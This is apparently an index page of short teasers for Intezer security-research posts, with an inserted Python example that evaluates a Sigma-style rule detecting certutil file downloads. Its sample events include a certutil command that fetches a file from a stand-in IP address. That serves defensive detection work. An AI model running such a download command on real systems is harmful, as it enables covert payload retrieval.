This post describes the technical analysis of a new campaign, detected by Intezer’s research team, that initiates attacks with a phishing email...
Integrate with SentinelOne, CrowdStrike, and More: One of the biggest pain points of cyber security teams is alert fatigue – trying to...
Adversaries are highly motivated, constantly expanding and improving their tools and techniques. On the other side of the fight, security teams are...
Save time during incident response with these tips and tools to help your team accelerate HD, memory, and live...
One of the biggest pain points of cyber security teams is alert fatigue – trying to keep up with a tedious, never-ending...
Sigma is a universal markup language for analyzing logs, which you can use to write threat hunting and detection rules for evolving...
Generate Advanced YARA Rules Based on Code Reuse: Incorporating YARA into daily security operations can accelerate incident response time, classify malware, empower...
In our interconnected society, the telecom industry is responsible for keeping the world connected 24/7. The telecommunication infrastructure uses satellites, internet providers,...
Manufacturers are building automated workflows for alert triage, incident response, and threat hunting to meet a rising volume of...
Portable Document Format (PDF) files are a cross-platform file format, supporting links, images, and fonts. The flexibility of the PDF format makes these...
A recently developed malware framework called Elephant is being delivered in targeted spear phishing campaigns using spoofed Ukrainian governmental email addresses. The...
Automation can augment your security team to help you manage never-ending alerts, reduce skill gaps, and respond...
Sigma rules are catching on more and more for SOC teams, as a way to write one rule that can be used...
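The two Sigma entries above describe the format only in one sentence each: a rule is written once in a vendor-neutral form and then either converted for a particular SIEM or evaluated directly. The following is an added example, not code from any of the Intezer posts listed here, of a small evaluator for a Sigma-style rule. The rule (a certutil download pattern), the allow-list filter on a parent process named sccm-agent.exe, and the three process-creation events are all constructed for illustration; only a subset of Sigma's field modifiers (contains, startswith, endswith) and condition grammar (and, or, not, parentheses) is supported.

```python
"""Added example: evaluate a Sigma-style detection rule against sample events
and render the same rule as a Splunk-style search string.
All rule contents, field names and events below are constructed for illustration."""

import re

# Constructed Sigma-style rule (assumed Windows process-creation log source).
RULE = {
    "title": "certutil used to download a file",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            # A list under one field means "any of these values" in Sigma.
            "CommandLine|contains": ["urlcache", "-split"],
        },
        # Hypothetical allow-list: a software-deployment agent that legitimately
        # runs certutil this way (assumption for the example, not a real product).
        "filter": {"ParentImage|endswith": "\\sccm-agent.exe"},
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed sample events, not real telemetry.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://updates.example/agent.cab agent.cab",
     "ParentImage": "C:\\Program Files\\SCCM\\sccm-agent.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -hashfile setup.exe SHA256",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def _match_value(value, expected, modifier):
    """Case-insensitive comparison with one Sigma modifier applied."""
    v, e = str(value).lower(), str(expected).lower()
    if modifier == "contains":
        return e in v
    if modifier == "startswith":
        return v.startswith(e)
    if modifier == "endswith":
        return v.endswith(e)
    return v == e


def match_selection(selection, event):
    """All fields of a selection must match; a list of values matches if any does."""
    for key, expected in selection.items():
        field, *mods = key.split("|")
        modifier = mods[0] if mods else "equals"
        value = event.get(field)
        if value is None:
            return False
        candidates = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(value, c, modifier) for c in candidates):
            return False
    return True


def _tokens(condition):
    return re.findall(r"\(|\)|[A-Za-z_]\w*", condition)


def _eval_condition(condition, results):
    """Tiny recursive-descent evaluator for 'a and not (b or c)' style conditions."""
    tokens, pos = _tokens(condition), 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def parse_or():
        left = parse_and()
        while peek() == "or":
            take()
            right = parse_and()
            left = left or right
        return left

    def parse_and():
        left = parse_not()
        while peek() == "and":
            take()
            right = parse_not()
            left = left and right
        return left

    def parse_not():
        if peek() == "not":
            take()
            return not parse_not()
        return parse_atom()

    def parse_atom():
        tok = take()
        if tok == "(":
            value = parse_or()
            take()  # closing parenthesis
            return value
        if tok not in results:
            raise ValueError(f"unknown identifier in condition: {tok}")
        return results[tok]

    return parse_or()


def evaluate(rule, event):
    """True if the event satisfies the rule's condition."""
    det = rule["detection"]
    results = {name: match_selection(sel, event)
               for name, sel in det.items() if name != "condition"}
    return _eval_condition(det["condition"], results)


def run_rule(rule, events):
    """Indices of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if evaluate(rule, ev)]


def to_splunk(rule):
    """Render the rule as a Splunk-style search: the 'one rule, many backends' idea."""
    det = rule["detection"]

    def render(sel):
        parts = []
        for key, expected in sel.items():
            field, *mods = key.split("|")
            modifier = mods[0] if mods else "equals"
            vals = expected if isinstance(expected, list) else [expected]
            alts = []
            for v in vals:
                v = str(v).replace("\\", "\\\\").replace('"', '\\"')
                pat = {"contains": f"*{v}*", "endswith": f"*{v}",
                       "startswith": f"{v}*"}.get(modifier, v)
                alts.append(f'{field}="{pat}"')
            parts.append("(" + " OR ".join(alts) + ")")
        return " AND ".join(parts)

    named = {name: render(sel) for name, sel in det.items() if name != "condition"}
    out = []
    for tok in _tokens(det["condition"]):
        if tok in ("and", "or", "not"):
            out.append(tok.upper())
        elif tok in ("(", ")"):
            out.append(tok)
        else:
            out.append("(" + named[tok] + ")")
    return " ".join(out)


if __name__ == "__main__":
    print("matching events:", run_rule(RULE, EVENTS))  # the first event only
    print(to_splunk(RULE))
```

Only the first event fires: the second matches the selection but is removed by the filter, and the third never matches the selection. A real deployment would use the sigma-cli converter rather than a hand-written renderer, but the walk over the condition is the same idea: the rule logic lives in one place and each backend is a different rendering of it.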
Use this open-source Just-In-Time database access control tool (integrated with directory service, Slack, and SIEM) to secure your...
Analyzing suspicious URLs on an individual basis can be tricky, but when you’re facing a large volume of potentially malicious URLs then...
Threat actors have a wide range of tools and techniques they can use in cyber attacks including: malware-as-a-service, open-source tools and malware...
At Intezer, we recently launched a URL analysis feature that allows detecting phishing or malicious URLs. To do so, we have...
This post was originally published as a white paper in September 2021. Get the full report as a PDF here. Summary (Executive...
As part of our ongoing effort to allow you to investigate any security incident, we have made an important expansion to the...
When you reverse engineer code as part of an incident response team, you want to quickly get information about what kind of...
Financial services are a prime target for cyberattackers. The reason is easy to understand: attackers follow the money. Most work in this...
A “honeypot” is a metaphor that references using honey as bait for a lure or trap. Honeypots have served many purposes in...
All the most common file types that can be used to deliver malicious code, including Microsoft Office files, are supported in Intezer...
Malware targeting multiple operating systems is no longer an exception in the threat landscape. Vermilion Strike, which was documented just last September,...
Malware researchers require a diverse skill set usually gained over time through experience and self-training. Reverse engineering (RE) is an integral part of...
Threat actors use malicious software to cause damage to individuals and organizations. Malware is the most common form of cyberattack because...
Vulnerabilities like Log4Shell (CVE-2021-44228) are difficult to contain using traditional mitigation options and they can be hard to patch. It can be hard to...
The skillset of performing binary analysis may to some appear to be limited to a few undeadly souls. While it may look...
Malware is the thorn in the side of security analysts everywhere. The main question when getting a suspicious file alert is, “Is...
Research between Intezer and Checkmarx describes ChainJacking, a type of software supply chain attack that could be potentially exploited by threat actors...
The MITRE Corporation released D3FEND™ (aka MITRE DEFEND™), a complementary framework to its industry acclaimed MITRE ATT&CK® matrix. MITRE D3FEND provides defense techniques...
GitLab servers are under attack with a now-patched critical vulnerability: Earlier this week we investigated an incident that occurred on a new...
Workflow management platforms are powerful tools for automating and managing complex tasks. Integrating workflow platforms can help companies coordinate and ease their...
Cloud Workload Protection Platforms (CWPPs) are a new generation of modern, scalable security solutions designed to protect applications in today’s landscape of...
This research refers to misconfigured Apache Airflow managed by individuals or organizations (“users”). As a result of the misconfiguration, the credentials of...
Cloud security constructs are always aligned with the concept of shared responsibility. GCP emulates this principle with its own shared responsibility model,...
Do you remember how it felt to get your first email account? Not only were you able to communicate with multiple people...
When analyzing malware, one of the goals in addition to identifying what malware it is, is to understand what it does when...
Key Findings: Discovered a Linux & Windows re-implementation of Cobalt Strike Beacon written from scratch. The Linux malware is fully undetected by vendors. Has IoC and...
The cloud has completely transformed the IT landscape over the last few years. And it’s now entering a new era of hybrid-cloud...
We are happy to introduce the Intezer Analyze plugin for Maltego. Combine insights from our malware analysis platform with Maltego’s graphical tool (And you...
Cobalt Strike is a penetration testing tool created by Raphael Mudge in 2012. To this day, it remains extremely popular both in...
The MITRE Corporation recently released MITRE D3FEND™, a complementary framework to its industry acclaimed MITRE ATT&CK® matrix. D3FEND provides defense techniques that...
Enterprises today rely on a wide range of cloud services—infrastructure as a service (IaaS), platform as a service (PaaS), software as a...
Automate malware analysis of Netfilter rootkit and other advanced threats. Obtain deep insights without long, manual effort. News broke in June about a...
How to scope, plan, and execute an effective supply chain security initiative. Supply Chain is Latest Land Grab for Cyber Attackers: Software...
Key Points: Intezer has detected a new attack vector against Kubernetes (K8s) clusters via misconfigured Argo Workflows instances. Attackers are already taking advantage of this...
Itai Tevet, CEO of Intezer, shares the company’s vision for a simplified, consolidated malware analysis experience. Since its inception, Intezer has strived...
In May 2021, Fortinet published a report about the early stages of an ongoing phishing attack against the Ukrainian government. The attack, initially...
Our research team has found a sophisticated campaign, active for at least one year, targeting large international companies in the energy, oil...
Malware threats come in many forms. You can now analyze more of them with Intezer Analyze We have made a major expansion...
Validating your Software Supply Chain for Tampering: SolarWinds, Codecov and now Kaseya are the latest supply chain attacks we know about. In...
With more malware written in Golang than ever before, the threat from Go-based Remote Access Trojans (RATs) has never been higher. Not only...
If you have servers connected to the internet, you likely have valuable data stored on them that needs to be protected from...
Prioritize immediate risks in your cloud production environment: Recently added Intezer Protect features for reducing the likelihood of an attack have a unique...
Bazar is the latest tool developed by the TrickBot gang. Common malware used for cybercrime such as Agent Tesla, Dridex and Formbook...
73% of organizations using the cloud are not sure which parts of security fall under their responsibility. Ultimately, the customer is responsible for...
Security is changing as companies move their mission-critical workloads to the cloud, with Azure as one of the preferred destinations. Security in Azure follows...
Like all leading cloud service providers, AWS follows a shared responsibility model for security and compliance. While platform-level security is owned and managed...
In this post I will explain how the Microsoft Azure Virtual Machine (VM) extension works and how we found a fatal vulnerability in...
We have discovered a new malware written in Go, which we are calling HabitsRAT, targeting both Windows and Linux machines. The Windows version of...
Not All Applications are Cloud-Native: Companies are adopting cloud at a faster pace but not all applications are born cloud-native. Many traditional...
One of the most common benefits of transitioning to cloud services is the shared responsibility for securing your assets. But cloud providers...
New Malware Variant Exploits Production Environment: Rocke Group is a Chinese-based threat actor most known for running cryptojacking malware on Linux machines. The...
The arrival of the cloud has changed the application development process. Agile cloud-native applications have replaced traditional monolithic application architectures, and components...
With Linux being the operating system for 96% of the cloud, the landscape has changed beyond endpoint detection. Intezer Protect is built...
Significantly reduce memory forensics time from hours to minutes: Memory analysis is a core component of a typical incident response process. In many cases...
We’re excited to announce the release of two new Intezer Protect features. Intezer Protect now offers under the same roof not only...
They all target Linux systems. For a long time Linux has not been seen as a serious target of threat actors. This...
We discovered a new sophisticated backdoor targeting Linux endpoints and servers. Based on Tactics, Techniques, and Procedures (TTPs) the backdoor is believed to...
Dov Lerner from Cybersixgill contributed to this report. Intro: Programmers frequently reuse code, as recycling something that is already written and functional is...
Kaiji is a Linux malware that targets cloud servers. Last week we detected a new Kaiji variant. It was undetected by all...
Developers are not the only ones that have adopted Go. Malware written in Go has been steadily increasing. In the last few...
Intezer’s 2021 X-Force Threat Intel Index Highlights: It was a lot of fun collaborating with IBM on their 2021 X-Force Threat Intelligence...
Getting Caught Up to Speed: So far in this series we have profiled the ELF threat landscape and covered the most common...
Classifying a threat is just the first step in a malware analyst’s investigation. You know it’s malicious but what does it do?...
Kubernetes is one of the top open-source container orchestration projects, as it dramatically simplifies the creation and management of applications by providing...
It can be the difference between maintaining a safe environment for your applications or a compromised machine running malicious code. Misconfiguration of...
Summary of Findings: In previous months...
Cryptocurrency is trending. Bitcoin traded at a record high of nearly $42,000 this month. Now Ether, the world’s second largest cryptocurrency, is closing in...
For organizations, cloud adoption is the primary driver of digital transformation and modernizing traditional applications to cloud constructs is a major milestone....
Intro Linux threats are becoming more frequent. A common type of Linux threat is cryptojacking, which is the unauthorized use of an...
What is Proactive Hunting? Advanced attacks like the SolarWinds backdoor and Pay2KEY are on the rise, while preventive solutions have failed to detect them....
Already with thousands of victims. Intro With Bitcoin on the rise and a market exceeding billions of dollars, cryptocurrency has attracted threat actors...
Intro In early December, we discovered a new, undetected worm written in Golang. This worm continues the popular 2020 trend of multi-platform malware developed...
We tagged 2019 as The Year of the Linux Threat. That trend continued in 2020 with high profile APTs launching ELF malware,...
Last week we launched the community edition of Intezer Protect. With strong Linux threat detection, low overhead and no slowdown in performance, Intezer Protect is...
We’re rolling out an important update to the Intezer Analyze community edition to better accommodate our users. Effective December 17 community users will have...
Summary In November, we uncovered COVID-19 phishing lures that were used to deliver the Go version of Zebrocy. Zebrocy is mainly used...
Free runtime protection for your cloud workloads. Today we go live with the Intezer Protect community edition. After a few months...
Blogs about Linux cloud security are nothing new. However, most are filled with technical jargon that can make them difficult to understand....
Intro It is common for threat actors to evolve their Linux malware. BlackTech with their new ELF_PLEAD malware and Winnti’s PWNLNX tool are recent examples....
Intro In our last blog post we disclosed an escalation of privileges vulnerability in Microsoft Azure App Services. In this post, we’ll describe...
Code execution is the key ingredient in any successful cyber attack. Exploiting a misconfiguration or vulnerability is one of the more common...
In the spirit of Halloween we’re giving away YARA signatures for TrickBot and Emotet. Last year we handed out signatures for malware...
For traditional data center operations, security and compliance requirements have always been operational overhead. Traditional data centers are under unique stresses in...
Stop and think for a moment. How many virtual machines (VMs) do you have running in your production cloud environment? How many...
We’ve made some updates in Intezer Analyze to improve your incident response and threat intelligence workflows. From classifying samples faster to staying...
Cloud proliferation is on the rise, and more than ever before, security teams are on the lookout for solutions that align with...
Main Findings We discovered two vulnerabilities in Microsoft Azure. They existed in a popular cloud service called Azure App Services—specifically impacting Linux...
Just after the publication of this post the US-CERT released an alert about Emotet. Evolution is the result of adaptations that take...
Introduction The development of cross-platform malware is not new, however, we continue to observe a number of malware that were previously documented only...
The term Offensive Security Tool, also known as OST, is a controversial subject within the InfoSec community. It often sparks fierce debate...
APTs are targeting Linux systems more than they ever have. Linux Attacks are on the Rise The research community continues to witness...
There are many solutions available for securing your cloud applications and workloads. Even after doing your due diligence and making an investment,...
Taking inspiration from the MITRE ATT&CK® framework, we previously developed a matrix categorizing adversary tactics and techniques for Linux cloud servers. Linux...
Introduction TeamTNT is a cybercrime group that targets cloud environments including Docker and Kubernetes instances. The group has been previously documented using...
Introduction: Offensive Security Tools are any kind of functionality meant to facilitate intrusions and security bypasses in order to achieve an offensive goal....
Introduction In the previous article we profiled the ELF malware landscape and explained how malware infects systems. We discussed the current lack...
Update: Intezer Protect community edition is out of Beta and now available to everyone. Today we go live with the...
Key Findings Ngrok Mining Botnet is an active campaign targeting exposed Docker servers in AWS, Azure, and other cloud platforms. It has...
Zero Trust Execution is the industry recommended practice for securing workloads in the cloud. It provides a tight grip on your workloads...
Incident investigations usually begin with a triggered alert. One of the sensors deployed across your organization claims that suspicious activity has occurred...
Kubernetes (K8s) is the universal solution for container orchestration nowadays. This open-source tool allows a cluster to automatically scale, distribute, and handle...
Ghidra is a free and open source reverse engineering tool developed by the NSA. The plugin reduces the burden on the analyst...
Cloud Workload Protection (CWP) refers to the security of workloads running in the cloud in any type of computing environment, e.g. physical...
With an emphasis placed on protecting Windows endpoints, the antivirus industry is struggling to detect Linux threats. In a 2019 study conducted by...
Unpatched or undetected software vulnerabilities are a common method for malware delivery once exploited by attackers. Last month, the US-CERT urged IT...
The Intezer Analyze IDA Pro plugin is now available to community users! IDA Pro is the most common reverse engineering platform for...
The move to containerized workloads has proven to be a revolutionary step in the evolution of software engineering and distributed systems. One...
Introduction Linux has a large presence in the operating systems market because it’s open-sourced, free, and software development oriented—meaning its rich ecosystem...
We dubbed 2019 the year of Linux threats, evidenced by over 20 of our researcher’s publications related to attacks on this operating...
The use of Application Control—commonly referred to as whitelisting or Zero Trust Execution—is considered to be a robust and essential Cloud Workload...
See below some of the threats our community detected this month 1. Fileless Dridex sample, originally with five detections in VirusTotal, contains a payload...
Linux has become the “go-to” OS in cloud computing, running 90% of the public cloud workload. Linux usage has even surpassed Windows...
The Ke3chang group, also known as APT15, is an alleged Chinese government-backed cluster of teams known to target various high-profile entities spanning...
Intezer Protect, Intezer’s new Cloud Workload Protection Platform (CWPP), has been recognized in the latest Gartner Market Guide only four months since...
Recently attackers exploited vulnerabilities in the popular SaltStack infrastructure automation software to infect cloud servers. Several organizations and open-source projects had to...
It is not often that you see a botnet’s tooling written from scratch. The Internet of things (IoT) botnet ecosystem is relatively well-documented by...
Cloud Workload Protection is the protection and overall security of workloads running in the cloud in any type of computing environment. As...
Maze ransomware, APT41 and Lazarus highlight this month’s community samples 1. More_eggs variant with low Antivirus detections has modified string encoding mechanisms...
Threat actors are exploiting fear and uncertainty to spread Covid-19 themed malicious Android package kits (APKs) onto users’ mobile devices. APKs pose...
Under Armour’s famous slogan sums up the mission perfectly: We Must Protect this House. As adoption of cloud services continues, security teams...
Checklist for protecting your Linux cloud servers against cyber attacks Taking inspiration from the MITRE ATT&CK® framework, we have developed a matrix categorizing...
Accelerate your file investigations with new and improved string reuse capabilities in Intezer Analyze Users of Intezer Analyze may have noticed new...
Attackers have long used evasion features in their malware to avoid detection by security products and analysis systems. One of the most...
Conducting business in a cloud environment presents unique security challenges, including achieving and maintaining compliance with regulations that were designed with traditional...
Code reuse analysis vs. signature-based detection We are often asked the question, “what sets your approach apart from other malware detection solutions?”...
IDA Pro is the most common reverse engineering platform for disassembling computer software. The Intezer Analyze IDA Pro plugin accelerates reverse engineering...
This month’s community highlights span a variety of file formats — APK, ELF and PE. 1) Anubis [Link to Analysis] Anubis is...
This year’s RSA Conference theme is the Human Element. At Intezer, we introduce an innovative approach called Genetic Malware Analysis which reveals the...
Banking trojans and ransomware were the top innovators in 2019 malware code evolution Drawing on previous IBM X-Force collaboration in detecting new...
Introduction Our researchers Paul Litvak and Michael Kajilolti have discovered a new campaign conducted by APT34 employing an updated toolset. Based on uncovered...
Introduction Our research team has identified new versions of an old Linux malware known as Rekoobe, a minimalistic trojan with a complex CNC...
Unveiling our Cloud Workload Protection Platform (CWPP) which defends your cloud servers in runtime against the leading cause of cyber attacks: unauthorized and malicious...
Intezer Protect is our NEW runtime Cloud Workload Protection Platform (CWPP). Powered by Malware Analysis technology, this solution continuously monitors the code running...
Emotet, Trickbot, and Lazarus were the most common threats detected by the community in 2019. Linux threats, with code connections to Mirai,...
What an amazing year it has been for us at Intezer! The company nearly doubled in size, we added several new important...
Introduction ChinaZ is a Chinese cybercrime group and the author of several DDoS malware. We have profiled this group in a previous...
We are excited to share that we now support Genetic Malware Analysis for Android applications! Intezer Analyze community and enterprise users can...
Distributed denial-of-service attacks were on the rise in 2018 and continuing into 2019, ranging from a high volume of Mirai attacks to...
In this month’s community highlights we see a range of malware types, including banking trojans, exploit kits, and nation-state sponsored threats. 1)...
Summary Nearly all cyber attacks require running code. Regardless of the attack vector, in order for an adversary to create any damage,...
Intezer Analyze now proudly supports genetic analysis for files created with the Golang programming language. Community and enterprise users can detect and...
Introduction We have discovered an undetected Linux backdoor which does not have any known connections to other threat groups. VirusTotal detection rate...
Analysis by Intezer and IBM X-Force traces its origins to a Malware-as-a-Service (MaaS) provider utilized by the Cobalt Gang and FIN6 attack...
In the spirit of Halloween we’re spotlighting three “spooky” threats detected by the Intezer Analyze community in October. And as a special...
For mid to large size enterprises, protecting the organization against targeted cyber threats is often a global operation. It’s not uncommon for...
This research is a joint effort conducted by Omri Ben-Bassat from Intezer and Itay Cohen from Check Point Research. Prologue: If...
Introduction We previously reported on how we managed to temporarily shut down 15 operative QNAPCrypt ransomware campaigns targeting Linux-based file storage systems...
In a previous post we wrote for the Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC), we discussed the emergence of...
At BlackHat Arsenal 2019 Intezer’s researcher, Omri Ben-Bassat, revealed an open-source tool called MoP (“Master of Puppets”) which is a framework for reverse...
In July, Intezer Analyze community detections included GonnaCry ransomware, the HawkEye malware kit, and BXAQ, the spyware that Chinese authorities have been...
One of the most common and time-consuming cases security operations centers (SOCs) must complete daily are malware investigations. Part of the problem...
In addition to highlighting five notable file uploads and endpoint scans made by our community users each month, I thought it was...
Overview We have discovered a new version of WatchBog—a cryptocurrency-mining botnet operational since late 2018—that we suspect has compromised more than 4,500 Linux...
Introduction Linux desktop remains an unpopular choice among mainstream desktop users, making up a little more than 2% of the desktop operating system...
Introduction It is rare to see ransomware being used to target the Linux operating system. However, cyber criminals seem to adapt to...
1) BlackSquid [Link to Analysis] BlackSquid is a Monero crypto-miner which was recently discovered by researchers at Trend Micro. According to Trend...
I am pleased to highlight the new integration between Intezer Analyze™ and IBM Resilient. The integration enables users of both platforms to...
This blog post was featured as contributing content for the Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC). The Linux threat...
This is a new post in our Executable and Linkable Format (ELF) 101 series, where the goal is to spread awareness about the...
1) Pirpi (APT3) [Link to Analysis] APT3, commonly referred to as Gothic Panda, TG-0110 and Buckeye, is a Chinese cyber espionage group...
Overview • Intezer has discovered a new, sophisticated malware that we have named “HiddenWasp”, targeting Linux systems. • The malware is still...
This blog post serves as a preview to an Infosecurity Europe tech talk that will be presented on Wednesday, June 5, 2019....
Pacha Group is a crypto-mining threat actor we at Intezer discovered and profiled in a blog post published on February 28, 2019....
The Pacha Group is a threat actor discovered by Intezer and profiled in a blog post published on February 28, 2019. Dating back...
This month’s Intezer Analyze community findings include malware employed by two cyber espionage groups linked to the Russian government and an endpoint...
Get to know Intezer’s community manager, Shaul Holtzman. Shaul is a former cybersecurity analyst helping organizations detect and classify advanced cyber threats....
I am excited to announce the launch of a new Endpoint Analysis solution, located within the Intezer Analyze™ platform. The Endpoint Analysis solution consists...
Last month I published a blog post highlighting notable uploads made by the Intezer Analyze community during the month of February. In...
Introduction Cryptomining malware, also known as cryptojacking or cryptocurrency mining malware, refers to software developed to take over a computer’s resources and...
Key Takeaways: • Intezer has evidence of a new threat actor, calling it Pacha Group, which has been deploying undetected cryptojacking campaigns...
As manager of the free Intezer Analyze community edition I witness first hand the interesting samples our users upload on a daily...
On behalf of Intezer, I am pleased to announce the release of an API for the Intezer Analyze community edition. Members of...
At Intezer, we view malware analysis as a key component in properly and effectively responding to security incidents. We have introduced a...
Introduction Distributed denial-of-service (DDoS) attacks were on the rise in 2018, ranging from a high volume of Mirai attacks to more sophisticated...
Today My Online Security published research describing a fairly large Ursnif campaign targeting the United Kingdom. The threat actors behind the attack are using...
Alerts can enter an organization at inconceivable rates. Security teams are tasked with sifting through countless alerts, making it difficult to prioritize...
The Muhstik botnet was first exposed by Netlab360 researchers in May 2018. This botnet targeted mainly GPON routers. At Intezer we found that Muhstik is extending its spectrum...
At Intezer information sharing is a key component of our makeup and reflected in our technology. In the spirit of industry collaboration...
INTRODUCTION As seen by security researchers across the world and proven in a joint research by McAfee and Intezer, Lazarus, one of...
Researchers at Palo Alto Networks recently published a report regarding the NOKKI malware, which has shared code with KONNI and, although not in...
ELF Support: We would like to proudly announce that Intezer Analyze™ now supports genetic malware analysis for ELF binaries! You may now...
Introduction In the past couple years, Palo Alto Networks reported on the “Prince of Persia” malware campaign which is believed to be...
Our technology is based on genetic analysis of files. So far, we’ve focused mainly on detection of code reuse, as part of...
This research is a joint effort of Christiaan Beek, lead scientist & sr. principal engineer at McAfee, and Jay Rosenberg, senior security researcher...
Recently, Proofpoint released a fairly surprising report, stating that Banking Trojans have surpassed Ransomware as the top malware threat found in email....
In this blog post we’d like to share with you some details about our latest cool developments. New User Interface: We’ve recently...
APT15 Background Coincidentally, following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare, we...
As stated in a previous blog entry, it is common for malware authors to sign malicious files with “legitimate” digital certificates in...
In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code....
In our previous post, we went through the concept of symbols and their functionality. In this post we will introduce the concept...
Get an independent examination of your IT environment to detect any existing cyber attack in your network: Intezer, today announced the release...
After launching Intezer community edition in November 2017, we noticed that many of our users uploaded packed samples. Yet packed files don’t reveal the...
Cyber security is constantly evolving, and therefore rife with challenges. Whether hobbyist hackers or state-sponsored threat actors are targeting organizations, internal security...
Detecting Reused Ransomware Whether we’re dealing with a criminal threat actor looking to steal money from their victims using ransomware or malware...
In our previous post, we focused on understanding the relationship between sections and segments, which serve as the foundation for understanding the...
Introduction This marks the first of several blog posts that will focus on Executable and Linkable Format (ELF) files. In this series,...
As we have proven in previous research blog posts, malware authors often reuse the same code. This evolution of code and code...
Recent research conducted by the Cyber Security Research Institute (CSRI) demonstrates how easy and common it is for threat actors to purchase...
This isn’t a gimmick, we’re providing this quota FREE of charge. Intezer Analyze™ was created by incident team experts for incident response...
IBM X-Force recently released an excellent report on a new banking trojan named IcedID that is being distributed using computers already infected...
Kaspersky Labs published a technical analysis of a new malware, Silence that is aimed at attacking financial institutions. After uploading the loader...
Since my last post, we have found new evidence in the next stage payloads of the CCleaner supply chain attack that provide...
Large scale cyber attacks seem to be happening once a month these days. Originally discovered by ESET (https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/), Ukrainian and Russian organizations...
Security teams have a lot of noise to deal with in their day-to-day jobs. Every organization is managing thousands of alerts each...
Serial entrepreneur Alon Cohen co-founded and grew one of the world’s first cyber security startups, CyberArk, which eventually became a ‘unicorn’. Now,...
Software developers and malware authors share a desire to work smart, not hard In the software development world, engineers frequently use ready-made...
Recently, there have been a few attacks with a supply chain infection, such as Shadowpad being implanted in many of Netsarang’s products,...
Why Standard Hash Functions Aren’t Helpful In Memory At Intezer, we specialize in analyzing code from memory to deal with injections, process...
Our previous blog post was a short brief of new Agent.BTZ variants that we found. This second part in the series will...
Itai Tevet was the self-described ‘PC kid’ whose fascination with technology led to a strong interest in information security–an interest that benefited...
Throughout my career, I have witnessed many cyber security professionals adopting a “shoot and don’t ask questions” approach when dealing with malware....
Every organization that is impacted by the sharing and storage of data is discussing the General Data Protection Regulation (GDPR), a recently...
Agent.BTZ–also known as ComRAT–is one of the world’s oldest known state-sponsored threats, mainly known for the 2008 Pentagon breach. Technically speaking, Agent.BTZ...
About eight weeks ago, a critical RCE vulnerability present in every Samba version since 2010 was reported and patched. This vulnerability is...
Every day, wars are being waged on invisible battlefields. The enemy is hiding and stealthily leveling its attacks from within. This formidable...